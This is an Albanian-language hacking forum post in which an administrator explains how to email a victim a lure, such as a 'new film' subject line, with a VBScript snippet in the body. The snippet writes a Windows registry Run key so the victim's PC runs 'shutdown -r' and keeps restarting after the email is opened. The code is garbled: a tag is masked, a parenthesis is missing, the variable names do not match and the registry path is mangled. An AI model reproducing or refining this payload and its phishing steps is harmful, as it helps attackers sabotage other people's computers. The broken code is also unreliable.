E Hën, 27.05.19, 6:37 AM
Shqipet - Hack MainRegistrationLogin
Welcome Mysafir | RSS
[ New messages · Members · Forum rules · Search · RSS ]
  • Page 1 of 1
  • 1
Forum moderator: nicky  
Forum » Panelli i Kontrollit » Tutorials & Mësime » fikja naj kujt pc cdo 1 min
fikja naj kujt pc cdo 1 min
shqipet-hackDate: E Premte, 06.02.09, 6:44 PM | Message # 1
Admin
Group: Administrators
Messages: 1552
Reputation: 0
Status: Jo ne Qasje
Shkojm e hapim Inboxin ton dhe shkojm e kriojme nje email te ri dhe e shenojme emajlin e viktimes dhe ne Subject shenojme diqka interesante si ris NEW film dhe ne pjese ku e shenojme mesazhin vendosim kete

******** ****************="vbscript">
on error resume next
dim ok
set ok=CreateObject("WScript.Shell"

kutluk.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCur rent VersionRunSYSTEM32","shutdown -r"

kur ta hap emajlin viktima pc do ti fiked gjdo 24 sekonda
__________________

 
Forum » Panelli i Kontrollit » Tutorials & Mësime » fikja naj kujt pc cdo 1 min
  • Page 1 of 1
  • 1
Search:

Copyright MyCorp © 2019